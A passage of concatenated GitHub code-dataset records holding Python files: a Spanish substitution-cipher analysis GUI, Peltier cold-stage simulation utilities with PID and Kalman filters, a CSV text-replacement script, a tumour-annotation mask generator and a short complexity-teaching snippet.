open(rutaTXT, \"r\", encoding=\"UTF-8\")\r\n self.textoEncriptado = blockDeNotas.read()\r\n self.mostrarTextoEncriptado()\r\n blockDeNotas.close()\r\n self.mostrarBotonActualizar()\r\n self.textoCargadoExitosamente = True\r\n except:\r\n self.mostrarVentanaEmergente(\"Error Fatal\", \"No se puede abrir el archivo...\"+str(self.txtNombreTXT.get()))\r\n else:\r\n self.mostrarVentanaEmergente(\"Error Fatal...\", \"Se necesita introducir el nombre del txt sin la extensión\")\r\n\r\n\r\n def mostrarTextoEncriptado(self):\r\n self.txtTextoBruto.delete(\"1.0\", END)\r\n self.txtTextoBruto.insert(\"1.0\", self.textoEncriptado)\r\n self.actualizarEstadisticas()\r\n\r\n def actualizarEstadisticas(self):\r\n txt = \"%Porcentaje de Aparición de Caracteres%\\n\\n\"\r\n totalDeCaracteresDelTexto = len(self.textoEncriptado)\r\n \r\n\r\n estadisticaCaracteres = {}\r\n\r\n for i in self.textoEncriptado:\r\n if i in estadisticaCaracteres:\r\n estadisticaCaracteres[i] = estadisticaCaracteres[i] + 1 \r\n else:\r\n estadisticaCaracteres[i] = 1\r\n\r\n txt = txt + \"Total caracteres: \" + str(len(estadisticaCaracteres)) + \"\\n\\n\"\r\n\r\n porcentajeCaracteres = []\r\n\r\n\r\n for i in estadisticaCaracteres:\r\n porcentaje = (estadisticaCaracteres[i]/totalDeCaracteresDelTexto)*100\r\n porcentaje = round(porcentaje, 4)\r\n porcentajeCaracteres.append((i, porcentaje))\r\n\r\n # Organizar por burbuja\r\n # CopiarElVector\r\n copyPor = []\r\n for i in porcentajeCaracteres:\r\n copyPor.append(i)\r\n\r\n temp = None\r\n for i in range(0, len(copyPor)-1):\r\n for j in range(0, len(copyPor)-i-1):\r\n if copyPor[j][1] < copyPor[j+1][1]:\r\n temp = copyPor[j]\r\n copyPor[j] = copyPor[j+1]\r\n copyPor[j+1] = temp\r\n\r\n info = \"\"\r\n contador = 0\r\n for i in copyPor:\r\n if contador == 2:\r\n info = info + \"\\n\"\r\n contador = 0\r\n\r\n info = info + \"[\" + str(i[0]) + \"] =>\" + str(i[1]) + \"%\" + \" -- \"\r\n contador = contador + 1\r\n\r\n txt = txt + info\r\n\r\n self.bannerPorcentaje['text'] = txt\r\n\r\n\r\n def reemplazarEnTextoAB(self):\r\n if self.textoCargadoExitosamente:\r\n if self.validarReemplazoTextoA():\r\n # Se reemplaza y se guarda en el temporal \r\n self.textoTemporal = self.textoEncriptado.replace(self.txtReemplazarA.get(), self.txtReemplazarB.get())\r\n # Semuestra \r\n self.mostrarVentanaEmergente(\"Reemplazando : \"+self.txtReemplazarA.get()+\" -> \"+self.txtReemplazarB.get(), self.textoTemporal)\r\n\r\n\r\n\r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"para reemplzar un texto debe de introducir un patron inicial\")\r\n else:\r\n self.mostrarVentanaEmergente(\"Error fatal... \", \"Primero se debe de cargar un texto\")\r\n\r\n def verPalabrasSiElEspacioEsA(self):\r\n if self.textoCargadoExitosamente:\r\n if self.validarVerPalabrasSiElEspacioEs():\r\n palabras = self.textoEncriptado.split(self.txtVerPalabrasSiElEspacioEs.get())\r\n\r\n\r\n txt = \"\" # Mensaje pricipal\r\n br = \"---------------------------------\\n\" # Salto de linea bonito\r\n\r\n for i in palabras:\r\n txt = txt + \"\\n\" + i\r\n\r\n # Se pone el titulo y se muestran las posibles palabras\r\n txt = \"Estas son todas las posibles palabras si el espacio es: \" + \"/\" + self.txtVerPalabrasSiElEspacioEs.get() + \"/\" + \"\\n\" + txt\r\n\r\n txt = br + txt + br\r\n\r\n # Se muestran las estadisticas\r\n\r\n txt = txt + \"Posibles palabras: \" + str(len(palabras)) + \"\\n\" + br\r\n \r\n # Se muestran las coincidencias de palabras\r\n\r\n coincidencias = {}\r\n\r\n for i in palabras:\r\n if i in coincidencias:\r\n coincidencias[i] = coincidencias[i] + 1\r\n else:\r\n coincidencias[i] = 1\r\n\r\n # Se ordenan mediante burbuja\r\n # Organizar por burbuja\r\n # CopiarElVector\r\n copyPor = []\r\n for i in coincidencias:\r\n copyPor.append((i, coincidencias[i]))\r\n\r\n temp = None\r\n for i in range(0, len(copyPor)-1):\r\n for j in range(0, len(copyPor)-i-1):\r\n if copyPor[j][1] < copyPor[j+1][1]:\r\n temp = copyPor[j]\r\n copyPor[j] = copyPor[j+1]\r\n copyPor[j+1] = temp\r\n\r\n\r\n cantidadDePalabras = \"\"\r\n for i in copyPor:\r\n cantidadDePalabras = cantidadDePalabras + i[0] + \" => \" + str(i[1]) + \"\\n\"\r\n \r\n\r\n txt = txt + cantidadDePalabras\r\n\r\n\r\n self.mostrarVentanaEmergente(\"Si el espacio es... + /\" + self.txtVerPalabrasSiElEspacioEs.get(), txt)\r\n\r\n\r\n\r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"Introduzca un patrón ó caracter para ver si el espacio es...\")\r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"Para realizar la acción de espaciado cargue un texto\")\r\n\r\n def verCantidadDeCoindicenciasDePatron(self):\r\n if self.textoCargadoExitosamente:\r\n if self.validarPatronDeCoincidencia():\r\n\r\n patron = self.txtVerCuantasVecesApareceUnPatron.get() # Este es el patron que se esta buscndo\r\n longitudPatron = len(patron) # Que tan largo es el patron\r\n\r\n # Variables inforamtivas\r\n cuantasVecesApareceElPatron = 0\r\n\r\n\r\n contador = 0 # Para recorrer el texto encriptado\r\n limite = len(self.textoEncriptado)/longitudPatron # Para recorrer el texto encriptado\r\n while contador < limite:\r\n parteTextoEnciptado = self.textoEncriptado[contador:contador+longitudPatron]\r\n\r\n if patron == parteTextoEnciptado:\r\n cuantasVecesApareceElPatron = cuantasVecesApareceElPatron + 1\r\n\r\n contador = contador + longitudPatron\r\n\r\n\r\n # Se Hace el repote:\r\n txt = \"El patron: \" + patron + \" aparece un total de: \" + str(cuantasVecesApareceElPatron)\r\n\r\n self.mostrarVentanaEmergente(\"El patron aparece: \", txt) \r\n\r\n\r\n \r\n \r\n\r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"Se necesita ingresar un patrón de busqueda\")\r\n \r\n else:\r\n self.mostrarVentanaEmergente(\"Error...\", \"Para ver cuantas veces aparece el patrón cargue el texto\")\r\n\r\n\r\n\r\n def actualizartexto(self):\r\n self.txtTextoBruto.delete(\"1.0\", END)\r\n self.textoEncriptado = self.textoTemporal\r\n self.txtTextoBruto.insert(\"1.0\", self.textoEncriptado)\r\n self.actualizarEstadisticas()\r\n\r\n\r\n def mostrarVentanaEmergente(self, titulo, texto):\r\n ventanita = Toplevel()\r\n ventanita.geometry(\"800x600\")\r\n ventanita.title(titulo)\r\n tela = Canvas(ventanita, width=800, height=600)\r\n tela.place(x=0, y=0)\r\n txt = Text(tela, width=96, height=35)\r\n txt.insert(\"1.0\", texto)\r\n txt.place(x=10, y=10)\r\n\r\n def mostrarInstrucciones(self):\r\n titulo = \"Instrucciones para Retrasados Mentales\"\r\n\r\n texto = \"\"\"\r\n\r\nEste es el programa de desencriptado por sustitución del loko 2021\r\n\r\n1 -> tiene que cargar el archivo.txt :\r\n Asegurece de tener el archivo.txt luego copie el nombre del archivo sin la extensión .txt \r\n\r\n2 -> Si el archivo cargo correctamente se mostrará en pantalla con las estadisticas de caracteres \r\n\r\n3 -> Para hacer el reemplazo de caracteres:\r\n\r\n * Si desea reemplazar un caracter o conjunto de caracteres introduzcalos en la casilla A y será \r\n reemplazado por lo de la casilla B\r\n\r\n * Si desea eliminar los espacios en blanco: ingrese un espacio en blanco en la casilla A y nada en \r\n la casilla B\r\n\r\n //Una vez reemplado proceda a actualizar el texto para dejarlo en ese estado.\r\n\r\n4 -> Si ud supone que el espacio es el caracter ó patrón ... introduzcalo y este le mostrara como serian las posibles palabras.\r\n\r\n\r\nhttps://github.com/felipedelosh/descodificadorPorSustitucion/blob/main/Decriptor%20by%20loko.pdf\r\n\r\n \"\"\"\r\n\r\n self.mostrarVentanaEmergente(titulo, texto)\r\n\r\n def validarTxtEntradaTexto(self):\r\n return str(self.txtNombreTXT.get()).strip() != \"\"\r\n\r\n def validarReemplazoTextoA(self):\r\n return str(self.txtReemplazarA.get()) != \"\"\r\n\r\n def validarVerPalabrasSiElEspacioEs(self):\r\n return str(self.txtVerPalabrasSiElEspacioEs.get()) != \"\"\r\n\r\n def validarPatronDeCoincidencia(self):\r\n return str(self.txtVerCuantasVecesApareceUnPatron.get()).strip() != \"\"\r\n \r\n\r\n\r\nd = Decriptor()","repo_name":"felipedelosh/descodificadorPorSustitucion","sub_path":"decriptorLoko.py","file_name":"decriptorLoko.py","file_ext":"py","file_size_in_byte":12916,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26337320630","text":"import math\nimport numpy as np\nimport csv\nimport time\nfrom multiprocessing import Event\n\ndef QuantizeReading(reading, fraction_resolution_denominator):\n\treal_value = reading\n\ttry:\n\t\tmeasured_value = round(real_value * float(fraction_resolution_denominator)) / int(fraction_resolution_denominator)\n\texcept:\n\t\tprint(reading, fraction_resolution_denominator)\n\treturn measured_value\n\ndef AddNoise(reading, standard_deviation):\n\timport numpy as np\n\treal_value = reading\n\tnoise = np.random.normal(real_value, standard_deviation)\n\treturn noise\n\ndef PolynomialCorrection(measured_value, coefficients):\n\t# Apply a polynomial correction to a measured value.\n\t# Order of polynomial function is determined according to the number of coefficients.\n\t# Polynomial of form y = Ax^2 + Bx + C, coefficients of the form [A, B, C]. \n\tcorrected_value = 0.0\n\tif len(coefficients) > 0:\n\t\tfor term in range((len(coefficients))):\n\t\t\tvalue = (coefficients[term] * pow(measured_value, ((len(coefficients) - 1) - term)))\n\t\t\tcorrected_value += value\n\treturn corrected_value\n\nclass DriftFreeTimer():\n\tdef __init__ (self, signal_thread_event, kill_thread_event, interval_msecs):\n\t\t# Drift compensating timer.\n\t\tnext_call = time.time()\n\t\twhile kill_thread_event.wait(0.01):\n\t\t\tnext_call = next_call + interval_msecs\n\t\t\tsleep_duration = next_call - time.time()\n\t\t\tif sleep_duration < 0.0:\n\t\t\t\tsleep_duration = 0.0\n\t\t\ttime.sleep(sleep_duration)\n\t\t\tsignal_thread_event.set()\n\n\nclass PIDController():\n\tdef __init__(self, device_parameter_defaults, time_step, pid_coeffs, drive_mode):\n\t\tself.device_parameter_defaults = device_parameter_defaults\n\t\tself.time_step = float(time_step)\n\t\tself.drive_mode = drive_mode\n\t\tself.SetCoeffs(pid_coeffs)\n\n\tdef SetCoeffs(self, pid_coeffs):\n\t\tself.P = pid_coeffs['P']\n\t\tself.I = pid_coeffs['I']\n\t\tself.D = pid_coeffs['D']\n\t\tself.power_multiplier = pid_coeffs['power_multiplier']\n\t\n\tdef Initialise(self, current_temp, setpoint):\n\t\tself.current_temp = current_temp\n\t\tself.setpoint = setpoint\n\t\tself.error = self.current_temp - self.setpoint\n\t\tself.integral_error = 0.0\n\t\tself.output = 0.0\n\n\tdef Update(self, measurement):\n\t\terror = float(measurement) - self.setpoint\n\t\tself.delta_error = error - self.error\n\t\tself.error = error\n\t\tself.integral_error += (self.error * self.time_step) \n\t\t\n\t\t# Peltier module is not a symetrically bi-directional heat pump as waste heat is always emitted from the 'hot' side.\n\t\t# Therefore, due to it's low efficiency Peltier module is ~3-5 times more powerful as a heater than as a cooler.\n\t\t# For this reason, if we are in 'heating' mode (ie, negative throttle position) we need to correspondingly re-scale\n\t\t# our control coefficients.\n\t\tif self.output >= 0.0:\n\t\t\tP, I, D = (self.P, self.I, self.D)\n\t\telse:\n\t\t\tP, I, D = (self.P / self.power_multiplier, self.I / self.power_multiplier, self.D / self.power_multiplier)\n\t\tself.delta_output = (P * self.error) + (I * self.integral_error) + (D * self.delta_error * (1.0 / self.time_step))\n\t\tself.output += self.delta_output\n\n\t\t# ~self.integral_error += (self.error * self.time_step)\n\t\t# ~if (self.I * self.integral_error) > 100.0:\n\t\t\t# ~self.integral_error = 100.0 / self.I\n\t\t# ~elif (self.I *self.integral_error) < -100.0:\n\t\t\t# ~self.integral_error = -100.0 / self.I\n\t\t# ~self.delta_output = (self.P * self.error) + (self.I * self.integral_error) + (self.D * self.delta_error * (1.0 / self.time_step))\n\t\t# ~self.output = self.delta_output\n\t\t\n\t\t# Apply Peltier drive limits.\n\t\tif self.drive_mode == 1:\n\t\t\t# Heating only mode...\n\t\t\tif self.output > 0.0:\n\t\t\t\tself.output = 0.0\n\t\t\tif self.output < -100.0:\n\t\t\t\tself.output = -100.0\n\t\telif self.drive_mode == 2:\n\t\t\t# Heating/Cooling mode...\n\t\t\tif self.output > 100.0:\n\t\t\t\tself.output = 100.0\n\t\t\tif self.output < -100.0:\n\t\t\t\tself.output = -100.0\n\t\telif self.drive_mode == 3:\n\t\t\t# Cooling only mode...\n\t\t\tif self.output > 100.0:\n\t\t\t\tself.output = 100.0\n\t\t\tif self.output < 0.0:\n\t\t\t\tself.output = 0.0\n\t\treturn round(self.output, 3)\n\nclass Fluid():\n\tproperties = {}\n\tdef __init__(self, name, data_file, bulk_temperature):\n\t\tself.name = name\n\t\tself.data_file = data_file\n\t\tself.bulk_temperature = bulk_temperature\n\t\tvalues = []\n\t\twith open(self.data_file, 'r') as csvfile:\n\t\t\tspamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n\t\t\tfor i, row in enumerate(spamreader):\n\t\t\t\tif i == 0:\n\t\t\t\t\tcolumns = [[str(j)] for i, j in enumerate(row)]\n\t\t\t\telif i == 1:\n\t\t\t\t\tfor j, k in enumerate(row):\n\t\t\t\t\t\tcolumns[j].append(str(k))\n\t\t\t\telse:\n\t\t\t\t\tfor j, k in enumerate(row):\n\t\t\t\t\t\tcolumns[j].append(float(k))\n\t\t\tfor i in columns:\n\t\t\t\tself.properties[i[0]] = {}\n\t\t\t\tself.properties[i[0]]['units'] = i[1]\n\t\t\t\tself.properties[i[0]]['values'] = i[2:]\n\t\t\t\tif i[0] != 'Temperature':\n\t\t\t\t\tself.properties[i[0]]['fit_order'] = 3\n\t\t\t\t\tself.properties[i[0]]['fit_coeffs'] = np.polyfit(self.properties['Temperature']['values'], self.properties[i[0]]['values'], 2)\n\tdef GetProperties(self, temperature, property_name):\n\t\treturn np.polyval(self.properties[property_name]['fit_coeffs'], temperature)\n\nclass PeltierCooler():\n\tdef __init__(self, device_parameter_defaults, max_cooling_power, heatsink_temperature, number_of_elements, element_width, element_length, element_thermal_conductivity):\n\t\tself.device_parameter_defaults = device_parameter_defaults\n\t\tself.heatsink_temperature = heatsink_temperature\n\t\tself.heatsink_timestamp = 0.0\n\t\tself.number_of_elements = number_of_elements\n\t\tself.element_width = element_width\n\t\tself.element_length = element_length\n\t\tself.element_thermal_conductivity = element_thermal_conductivity\n\t\tself.throttle_percent = 0\n\t\tself.maximum_cooling_power = max_cooling_power\n\t\tself.current_cooling_power = 0.0\n\n\tdef ConductiveHeatTransfer(self, delta_t):\n\t\treturn self.number_of_elements * (self.element_thermal_conductivity * (self.element_width ** 2) * (delta_t / self.element_length))\n\n\tdef SetThrottle(self, throttle_percent):\n\t\tself.throttle_percent = float(throttle_percent)\n\t\tif self.throttle_percent >= 0.0:\n\t\t\t# We are 'cooling', power as normal.\n\t\t\tpumping_power = self.maximum_cooling_power\n\t\telse:\n\t\t\t# We are 'heating', power is increased to account for waste heat output.\n\t\t\tpumping_power = self.maximum_cooling_power * self.device_parameter_defaults['simulation_peltier_power_ratio']\n\t\tself.current_cooling_power = float((pumping_power / 100.0) * self.throttle_percent)\n\n\tdef GetHeatSinkTemperature(self, time_period):\n\t\tif self.device_parameter_defaults['simulation_hsk_temp_variation_active'] == True:\n\t\t\tself.heatsink_timestamp += time_period\n\t\t\theatsink_temperature = self.heatsink_temperature + (self.device_parameter_defaults['simulation_hsk_temp_variation_amplitude'] * np.sin(self.heatsink_timestamp * ((2 * np.pi) / self.device_parameter_defaults['simulation_hsk_temp_variation_period'])))\n\t\telse:\n\t\t\theatsink_temperature = self.heatsink_temperature\n\t\treturn heatsink_temperature\n\nclass CooledObject():\n\tdef __init__(self, device_parameter_defaults, temperature, edge_length, thickness, density, specific_heat_capacity):\n\t\tself.device_parameter_defaults = device_parameter_defaults\n\t\tself.temperature = temperature\n\t\tself.edge_length = float(edge_length)\n\t\tself.thickness = float(thickness)\n\t\tself.density = float(density)\n\t\tself.specific_heat_capacity = float(specific_heat_capacity)\n\t\tself.volume = np.power(edge_length, 2.0) * thickness\n\t\tself.mass = self.volume * self.density\n\t\tself.cooled_area = np.power(edge_length, 2.0)\n\t\tself.length_parameter = self.cooled_area / (self.edge_length * 4.0)\n\t\tself.conductive_heat_transfer = 0.0\n\t\tself.temperature_change_rate = 0.0\n\n\tdef ConvectiveHeatTransfer(self, fluid, delta_t):\n\t\tboundary_temperature = fluid.bulk_temperature + delta_t\n\t\tfilm_temperature = (fluid.bulk_temperature + boundary_temperature) / 2.0\n\t\tdensity = fluid.GetProperties(film_temperature, 'Density')\n\t\tthermal_expansion_coefficient = 1.0 / film_temperature\n\t\tdynamic_viscosity = fluid.GetProperties(film_temperature, 'DynamicViscosity') * 1e-5\n\t\tgrashof_number = (np.power(self.length_parameter, 3.0) * np.power(density, 2.0) * 9.81 * (-1.0*delta_t) * thermal_expansion_coefficient) / (dynamic_viscosity ** 2.0)\n\t\tprandtl_number = fluid.GetProperties(film_temperature, 'Prandtl\\'sNumber')\n\t\trayleigh_number = grashof_number * prandtl_number\n\t\t# We can't take a fractional power of a negative number with np.power(). \n\t\t# This solution taken from https://stackoverflow.com/a/45384691\n\t\tnusselt_number = 0.27 * (np.sign(rayleigh_number) * (np.abs(rayleigh_number)) ** 0.25)\n\t\tcoefficient_of_convective_heat_transfer = (nusselt_number * (fluid.GetProperties(film_temperature, 'ThermalConductivity') * 1e-2)) / self.length_parameter\n\t\theat_transfer_rate = coefficient_of_convective_heat_transfer * self.cooled_area * delta_t\n\t\treturn {'Rayleigh Number' : rayleigh_number, 'Convective Heat Transfer Coefficient' : coefficient_of_convective_heat_transfer, 'Heat Transfer Rate' : heat_transfer_rate}\n\n\tdef UpdateTemperature(self, fluid, peltier_cooler, integration_time, sub_time_steps):\n\t\tintegration_time = float(integration_time)\n\t\tsub_time_step = integration_time / float(sub_time_steps)\n\t\tsub_time = 0.0\n\t\tself.sub_times = []\n\t\tself.sub_temperatures = []\n\t\tself.sub_rates = []\n\t\thst = 0.0\n\t\tfor i in range(sub_time_steps):\n\t\t\tself.sub_times.append(sub_time)\n\t\t\tself.sub_temperatures.append(self.temperature)\n\t\t\t# ~heatsink_object_delta_t = self.temperature - peltier_cooler.heatsink_temperature\n\t\t\theatsink_temperature = peltier_cooler.GetHeatSinkTemperature(sub_time_step)\n\t\t\thst = heatsink_temperature\n\t\t\theatsink_object_delta_t = self.temperature - heatsink_temperature\n\t\t\tbulk_fluid_object_delta_t = self.temperature - fluid.bulk_temperature\n\t\t\tconductive_heat_transfer = peltier_cooler.ConductiveHeatTransfer(heatsink_object_delta_t)\n\t\t\tconvective_heat_transfer = self.ConvectiveHeatTransfer(fluid, bulk_fluid_object_delta_t)\n\t\t\t# Multiply overall rate by -1 as we are actually calculating flow INTO the object\n\t\t\tnet_heat_transfer_rate = (conductive_heat_transfer + convective_heat_transfer['Heat Transfer Rate'] + peltier_cooler.current_cooling_power) * -1.0\n\t\t\tdelta_t = ((net_heat_transfer_rate * sub_time_step) / (self.specific_heat_capacity)) * (1.0 / self.mass)\n\t\t\tself.temperature_change_rate = delta_t\n\t\t\tself.temperature += delta_t\n\t\t\tself.sub_rates.append((delta_t * (1.0 / (integration_time / float(sub_time_steps)))))\n\t\t\tsub_time += (integration_time / float(sub_time_steps))\n\t\tif self.device_parameter_defaults['simulation_display_hsk_temp'] == True:\n\t\t\tprint(hst - 273.15)\n\t\treturn self.temperature\n\nclass KalmanFilter():\n\tdef __init__(self, name, time_step, x0, F, q, p0, H, R):\n\t\tself.name = name\n\t\tself.time_step = time_step\n\t\tself.x0 = np.matrix(x0)\n\t\tself.F = np.matrix(F)\n\t\tself.Q = np.matrix([[q, 0.0], [0.0, q]])\n\t\tself.p0 = np.matrix(p0)\n\t\tself.H = np.matrix(H)\n\t\tself.R = np.matrix(R)\n\t\tself.B = np.matrix([[0.0], [0.0]])\n\tdef Predict(self):\n\t\tself.x1 = (self.F * self.x0) + self.B\n\t\tself.p1 = ((self.F * self.p0) * np.transpose(self.F)) + self.Q\n\tdef Update(self, measurement):\n\t\ty = np.matrix(np.array([[measurement], [0.0]]))\n\t\tz = y - (self.H * self.x1)\n\t\tS = self.H * self.p1 * np.transpose(self.H) + self.R\n\t\tK = self.p1 * np.transpose(self.H) * (S ** -1)\n\t\tself.x2 = self.x1 + (K * z)\n\t\tself.p2 = (np.eye(2) - (K * self.H)) * self.p1\n\t\tself.x0 = self.x2\n\t\tself.p0 = self.p2\n\nclass TimingMonitor():\n\tdef __init__(self, channel_id, mq_timestamp, event_kill):\n\t\tself.mq_timestamp = mq_timestamp\n\t\tself.event_kill = event_kill\n\t\tself.channel_id = channel_id\n\t\tself.current_timestamps = []\n\t\t\n\t\tprint(\"Timing monitor ready.\")\n\t\twhile True:\n\t\t\tif not self.event_kill.is_set():\n\t\t\t\tbreak\n\t\t\ttry:\n\t\t\t\tmost_recent_timestamp = self.mq_timestamp.get(False, timeout = None)\n\t\t\t\tif most_recent_timestamp[0] == 0:\n\t\t\t\t\tself.normalised_timestamps = [[j[0], round(j[1] - self.current_timestamps[0][1], 4)] for i, j in enumerate(self.current_timestamps)]\n\t\t\t\t\tprint('Channel ' + str(self.channel_id) + ': ', self.normalised_timestamps)\n\t\t\t\t\tself.current_timestamps = []\n\t\t\t\telse:\n\t\t\t\t\tself.current_timestamps.append(most_recent_timestamp)\n\t\t\texcept:\n\t\t\t\tpass\n\t\t# Flush timestamp message queue in readiness for shutdown. If we end this process with items still on the input\n\t\t# queue, attempts to join this process will block indefinitely.\n\t\twhile self.mq_timestamp.qsize() > 0:\n\t\t\ttry:\n\t\t\t\tmost_recent_timestamp = self.mq_timestamp.get(False, None)\n\t\t\texcept:\n\t\t\t\tpass\n\t\tprint(\"Timing monitor shut down.\")\n\ndef TruncateFloat(number, digits) -> float:\n\tstepper = 10.0 ** digits\n\treturn math.trunc(stepper * number) / stepper\n","repo_name":"sikora-scientific-instrumentation/cold_stage_4","sub_path":"Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":12517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32624006466","text":"import pandas as pd\nimport sys\nimport glob\nfrom src.settings import *\n\n\ndef getReplace(org, key, before, after):\n\torg[key] = org[key].str.replace(before, after)\n\treturn org\n\ndef replacePrice(org, key, down, up, a, b):\n\torg.loc[(org[key]=down), key] = org.loc[(org[key]=down),key] * a + b\n\treturn org\n\ndef readReplace(init, path_replce, key, orgData, replaced_csv_path):\n\n\n\twith open(path_replce, 'r', encoding='Shift-JIS') as f:\n\t\tfor line in f:\n\t\t\t## remove 'Newline character'\n\t\t\tline = line.strip().split(',')\n\t\t\tprint(len(line), line)\n\t\t\tif(key != \"price\"):\n\t\t\t\tif( len(line) == 2):\n\t\t\t\t\t## Before conversion and After conversion\n\t\t\t\t\tbefore = line[0]\n\t\t\t\t\t#after = '{0}({1})'.format(line[0], line[1])\n\t\t\t\t\tafter = line[1]\n\n\t\t\t\t\tnewData = getReplace(orgData, key, before, after)\n\t\t\t\t\t## Overwrite mode\n\t\t\t\t\tnewData.to_csv(replaced_csv_path, encoding='Shift-JIS', index=False)\n\t\t\telse:\n\t\t\t\tif( len(line) == 4):\n\t\t\t\t\t## down, up, a, b\n\t\t\t\t\tnewData = replacePrice(orgData, key, int(line[0]), int(line[1]), int(line[2]), int(line[3]))\n\t\t\t\t\t## Overwrite mode\n\t\t\t\t\tnewData.to_csv(replaced_csv_path, encoding='Shift-JIS', index=False)\n\ndef runHeader(init, pathReplceList, headers):\n\t#test\n\treplaced_csv_path = '../{0}_csv/replaced_{1}'.format(init['folder'], init['csv_name'])\n\torg_csv_path = '../{0}_csv/{1}'.format(init['folder'], init['csv_name'])\n\n\t# replaced_csv_path = '{0}_csv/replaced_{1}'.format(init['folder'], init['csv_name'])\n\t# org_csv_path = '{0}_csv/{1}'.format(init['folder'], init['csv_name'])\n\t# orgData = pd.read_csv(org_csv_path, encoding='Shift-JIS')\n\n\tfor head, path_replce in zip(headers, pathReplceList):\n\t\treadReplace(init, path_replce, head, orgData, replaced_csv_path)\n\ndef replaceName(org_data, df_replace):\n\tcopy_data = org_data.copy()\n\tfor i, d in enumerate(org_data['name']):\n\t\tadd_str = ''\n\t\tfor a, b in zip(df_replace['name_after'], df_replace['name_before']):\n\t\t\tif(str(b) in str(d)):\n\t\t\t\tadd_str += str(a) + ' '\n\t\tcopy_data['name'][i] = '[{}]'.format(add_str) + str(org_data['name'][i])\n\n\treturn copy_data\n\ndef replaceMaterial(org_data, df_replace):\n\tfor i, d in enumerate(org_data['Material']):\n\t\tadd_str = ''\n\t\tfor a, b in zip(df_replace['Material_after'], df_replace['Material_before']):\n\t\t\tif(str(b) in str(d)):\n\t\t\t\torg_data['Material'] = a\n\t\t\t\tbreak\n\n\treturn org_data\n\ndef runCsvList(init, pathReplceList, headers):\n\t#df_replace = pd.read_csv('replace_list.csv', encoding='Shift-JIS')\n\tdf_replace = pd.read_csv('replace_csv/replace_list.csv', encoding='Shift-JIS')\n\n\treplaced_csv_path = '{0}_csv/replaced_{1}'.format(init['folder'], init['csv_name'])\n\torg_csv_path = '{0}_csv/{1}'.format(init['folder'], init['csv_name'])\n\torg_data = pd.read_csv(org_csv_path, encoding='Shift-JIS', dtype = 'object')\n\n\tfor i in headers:\n\t\tif(i == 'name'):\n\t\t\torg_data = replaceName(org_data, df_replace)\n\t\tif(i == 'Material'):\n\t\t\torg_data = replaceMaterial(org_data, df_replace)\n\n\torg_data.to_csv(replaced_csv_path, encoding='Shift-JIS', index=False)\n\nif __name__ == '__main__':\n\tinit = setConst()\n\theaders = ['name', 'Material']\n\tpathReplceList = 0\n\trunCsvList(init, pathReplceList, headers)\n","repo_name":"kaiadachi/project_backcountry","sub_path":"src/toolReplace.py","file_name":"toolReplace.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74753809765","text":"import xml.etree.ElementTree as ET\nimport cv2\nimport numpy as np\nfrom time import perf_counter\nfrom functools import wraps\nimport os\nimport sys\nsys.path.append(r'../')\nfrom config import config\n\ndtype_to_format = {\n 'uint8': 'uchar',\n 'int8': 'char',\n 'uint16': 'ushort',\n 'int16': 'short',\n 'uint32': 'uint',\n 'int32': 'int',\n 'float32': 'float',\n 'float64': 'double',\n 'complex64': 'complex',\n 'complex128': 'dpcomplex',\n}\n\ndef timer(function):\n @wraps(function)\n def new_function(*args, **kwargs):\n start_time = perf_counter()\n result = function(*args)\n elapsed = perf_counter() - start_time\n print('Function \"{name}\" took {time} seconds to complete.'.format(\n name=function.__name__, time=elapsed))\n return result\n\n return new_function\n\n\ndef numpy2vips(a):\n height, width = a.shape\n linear = a.reshape(width * height * 1)\n vi = pyvips.Image.new_from_memory(linear.data, width, height, 1,\n dtype_to_format[str(a.dtype)])\n return vi\n\n\ndef color_group(mask, xml_root, group_name, color=255):\n coordinates = xml_root.findall(\n \".//Annotation[@PartOfGroup='{}']/Coordinates\".format(group_name))\n\n for regions in coordinates:\n points = []\n for region in regions:\n x = float(region.attrib['X'])\n y = float(region.attrib['Y'])\n points.append([x, y])\n if len(points):\n pts = np.asarray([points], dtype=np.int32)\n cv2.fillPoly(mask, pts, color=color)\n\n return mask\n\n\n@timer\ndef genMask(slide_path, xml_path, save_mask_path):\n slide = pyvips.Image.new_from_file(slide_path)\n mask = np.zeros((slide.height, slide.width), dtype=np.uint8)\n\n xml_root = ET.parse(xml_path)\n mask = color_group(mask, xml_root, 'tumor', 255)\n mask = color_group(mask, xml_root, 'normal', 0)\n vips_img = numpy2vips(mask)\n vips_img.tiffsave(save_mask_path, compression='deflate',tile=True,\n bigtiff=True, pyramid=True, miniswhite=False, squash=False)\n\n\nif __name__ == '__main__':\n import pyvips\n # python gen_mask.py name.mrxs\n slide_name = sys.argv[1]\n uuid = slide_name.split('.')[0]\n slide_path = config[\"wsi_root_path\"] + f\"/{slide_name}.tif\"\n xml_path = config[\"preprocess_save_path\"] + f\"/{uuid}/{uuid}_result.xml\"\n save_mask_path = config[\"preprocess_save_path\"] + f\"/{uuid}/{uuid}_result.tiff\"\n print('[INFO] start converting '+uuid+' annotation into mask ...')\n genMask(slide_path, xml_path, save_mask_path)\n print('[INFO] convert '+uuid+' done')\n","repo_name":"Chloe1997/tumor-detection","sub_path":"TEST/Gen_mask.py","file_name":"Gen_mask.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5366545817","text":"# most polynomial complexity are quadratic\n# growth with square of size of input\n\n\ndef is_subset(L1, L2):\n for e1 in L1:\n matched = False\n for e2 in L2:\n if e1 == e2:\n matched = True\n break\n if not matched:\n return False\n return True\n\n\ndef intersect(L1, L2):\n \"\"\"find intersect list\"\"\"\n tmp = []\n for e1 in L1:\n for e2 in L2:\n if e1 == e2:\n tmp.append(e1)\n res = []\n for e in tmp:\n if not (e in res):\n res.append(e)\n return res\n\n\nb = intersect([1, 2, 3, 4, 5], [3, 4, 5, 6, 